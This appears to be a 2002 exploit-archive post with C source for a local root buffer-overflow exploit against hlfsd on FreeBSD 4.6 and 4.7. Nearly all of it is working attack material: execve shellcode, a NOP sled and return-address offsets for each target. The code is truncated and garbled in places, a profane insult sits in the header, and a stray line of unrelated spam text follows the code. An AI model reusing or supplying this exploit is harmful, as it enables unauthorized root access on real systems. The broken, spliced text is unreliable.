Hi Packetstormsecurity guys. /* * hlfsd-xp.c * Local root exploit for hlfsd. * 1) FreeBSD 4.7-RELEASE * 2) FreeBSD 4.6-STABLE * hlfsd not suid by default, but if... g0t r00t. * argv[1] - buffer size (def: 1000), argv[2] - offset (def: 0) * Thanks to: thefate, v1pee, Billi_k1d, meff, lbyte,xaoc * Fuckz to: S|{IF yestarday you hurt me bad, you think I'm worse than * you are? fuck you then! * * r00terX, NERF gr0up. (c) 2002 , nerf.ru * advisory by division7 */ #include #include #include #define NOP 0x90 #define DEFAULT_BUFFER_SIZE 1041 char freebsdshellcode[] ="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f" "\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53" "\xb0\x3b\x50\xcd\x80"; unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } struct TARGET { char *type; char *shellcode; int pad; }; struct TARGET targets [] = { {"Freebsd 4.6-STABLE -x86 shellcode",freebsdshellcode,120}, {"Freebsd 4.7-RELEASE -x86 shellcode",freebsdshellcode,0}, {NULL, NULL, 0} }; void ussage (char *argv); int main(int argc, char **argv) { char *buff, *ptr; long *addr_ptr, addr; int bsize=DEFAULT_BUFFER_SIZE; int i; int target; if ((argc < 2)) ussage(argv[0]); target = atoi(argv[1]); if(!(buff = malloc(bsize))) { printf("Can\`t allocate memory.\n"); exit(0); } addr = get_sp() - targets[target].pad; printf("Using target: %s\n", targets[target].type); printf("Using address: 0x%x\n", addr); printf("Using buffer size: %d\n", DEFAULT_BUFFER_SIZE); printf("Using offset: %d\n", targets[target].pad); ptr = buff; addr_ptr = (long *) ptr; for(i=0; i \ntargets avalible:\n\n"); list_targets (); exit(0); }

亚洲欧美在线